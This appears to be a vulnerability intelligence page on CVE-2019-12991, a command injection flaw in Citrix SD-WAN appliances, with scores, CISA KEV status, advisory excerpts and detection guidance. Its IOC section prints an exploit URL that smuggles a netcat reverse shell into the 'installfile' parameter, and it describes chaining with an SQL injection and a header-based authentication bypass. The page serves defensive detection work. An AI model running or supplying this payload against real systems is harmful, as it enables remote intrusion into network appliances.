CVE-2019-12991
published 2019-07-16CVE-2019-12991: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 5 of 6).
PriorityP191high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
73.88%
99.4th percentile
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 5 of 6).
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citrix | citrix_sd-wan | — | — |
| citrix | netscaler_adc_gateway | — | — |
| citrix | netscaler_sd-wan | >= 10.0.0 < 10.0.8 | 10.0.8 |
| citrix | sd-wan | — | — |
| citrix | sd-wan | >= 10.2.0 < 10.2.3 | 10.2.3 |
| citrix | xenserver | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/cgi-bin/installpatch.cgi?swc-token=01234&installfile=`sudo%20nc%20-nv%20192.168.1.191%204444%20-e%20/bin/bash`↗
- →Detect HTTP GET requests to /cgi-bin/installpatch.cgi containing backtick-wrapped OS commands in the 'installfile' parameter, indicative of command injection exploitation. ↗
- →Alert on HTTP requests to /cgi-bin/installpatch.cgi where the 'installfile' query parameter contains shell metacharacters such as backticks or pipe characters. ↗
- →Monitor for HTTP POST requests to /sdwan/nitro/v1/config/get_package_file?action=file_download with the 'SSL_CLIENT_VERIFY: SUCCESS' header set by a client (not the TLS layer), as this is used to bypass authentication in the chained exploit. ↗
- →Look for execution of 'nc' or 'netcat' with '-e /bin/bash' arguments spawned by the web server process (e.g., apache/httpd), indicating successful reverse shell via CVE-2019-12991. ↗
- →Monitor for execution of user_management.pl with 'addUser' arguments from non-administrative sessions, indicating post-exploitation privilege escalation on the appliance. ↗
- ·The command injection (CVE-2019-12991) requires prior authentication; however, it can be chained with the unauthenticated SQL injection (CVE-2019-12989) to achieve full unauthenticated RCE. Detection logic should account for both the standalone authenticated case and the chained unauthenticated exploit path. ↗
- ·The swc-token value used in the installpatch.cgi exploit URL is dynamically generated (random 5-digit integer) during the SQL injection phase; detection rules should match on the parameter name pattern rather than a static token value. ↗
- ·The exploit expects a ReadTimeout on the command injection request as the success indicator (reverse shell blocks the response); network-level detection should not rely solely on HTTP response codes for this endpoint. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck8.8HIGH
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Citrix SD-WAN and NetScaler Command Injection Vulnerability
cisa·2022-03-25·CVSS 8.8
CVE-2019-12991 [HIGH] CWE-78 Citrix SD-WAN and NetScaler Command Injection Vulnerability
Vulnerability: Citrix SD-WAN and NetScaler Command Injection Vulnerability
Affected: Citrix SD-WAN and NetScaler
Authenticated Command Injection in Citrix SD-WAN Appliance and NetScaler SD-WAN Appliance.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-12991
Remediation Due Date: 2022-04-15
Citrix
CVE-2019-12991: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 5 of 6).
vendor_citrix·2019-07-16·CVSS 8.8
CVE-2019-12991 [HIGH] CWE-78 CVE-2019-12991: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 5 of 6).
CVE-2019-12991: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 5 of 6).
CISA KEV: Authenticated Command Injection in Citrix SD-WAN Appliance and NetScaler SD-WAN Appliance.
Required Action: Apply updates per vendor instructions.
Citrix
Citrix SD-WAN Multiple Security Updates
vendor_citrix·CVSS 9.8
CVE-2019-12985 [CRITICAL] Citrix SD-WAN Multiple Security Updates
Citrix SD-WAN Multiple Security Updates
of Problem Multiple vulnerabilities have been identified in the management console of the Citrix SD-WAN Center and NetScaler SD-WAN Center. Multiple Vulnerabilities have also been identified on the Citrix SD-WAN Appliance and NetScaler SD-WAN Appliance. Collectively, these vulnerabilities could result in an unauthenticated attacker executing commands as root against the SD-WAN Center management console, or potentially be used to gain root privileges on the SD-WAN appliance. The vulnerabilities have been assigned the following CVE numbers. CVE-2019-12985 – Unauthenticated Command Injection in Citrix SD-WAN Center 10.2.x before 10.2.3 and NetScaler SD-WAN Center 10.0.x before 10.0.8. CVE-2019-12986 – Unauthenticated Command Injection in Citrix SD-WAN
GHSA
GHSA-462p-6gjx-6wj6: Citrix SD-WAN 10
ghsa_unreviewed·2022-05-24
CVE-2019-12991 [HIGH] CWE-78 GHSA-462p-6gjx-6wj6: Citrix SD-WAN 10
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 5 of 6).
VulnCheck
Citrix SD-WAN and NetScaler Command Injection Vulnerability
vulncheck·2019·CVSS 8.8
CVE-2019-12991 [HIGH] CWE-78 Citrix SD-WAN and NetScaler Command Injection Vulnerability
Citrix SD-WAN and NetScaler Command Injection Vulnerability
Authenticated Command Injection in Citrix SD-WAN Appliance and NetScaler SD-WAN Appliance.
Affected: Citrix SD-WAN and NetScaler
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Remediation Due: 2022-04-15
No detection rules found.
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Threat Research Center
Threat Research
Malware
## Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Ruchna Nigam
Published: December 13, 2019
Malware
Threat Research
Vulnerabilities
Echobot
IoT
IoT Vulnerability
Mirai
Mirai variant
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploite
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploited in the wild until now, ranging from extremely old CVEs from as long back as 2003, to recent vulnerabilities made public as recently as early December 2019. Based on this seemingly odd choice, one could risk a guess that the attackers could potentially be aiming for the sweet sp
Tenable
Multiple Vulnerabilities Found in Citrix SD-WAN Center and SD-WAN Appliances
blogs_tenable·2019-07-11
Multiple Vulnerabilities Found in Citrix SD-WAN Center and SD-WAN Appliances
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Citrix SD-WAN Appliance Multiple Vulnerabilities
blogs_tenable·2019-07-02
Citrix SD-WAN Appliance Multiple Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
http://packetstormsecurity.com/files/153638/Citrix-SD-WAN-Appliance-10.2.2-Authentication-Bypass-Remote-Command-Execution.htmlhttp://www.securityfocus.com/bid/109133https://support.citrix.com/article/CTX251987https://www.tenable.com/security/research/tra-2019-32http://packetstormsecurity.com/files/153638/Citrix-SD-WAN-Appliance-10.2.2-Authentication-Bypass-Remote-Command-Execution.htmlhttp://www.securityfocus.com/bid/109133https://support.citrix.com/article/CTX251987https://www.tenable.com/security/research/tra-2019-32https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-12991
2019-07-16
Published
2022-03-25
Added to CISA KEV
Exploited in the wild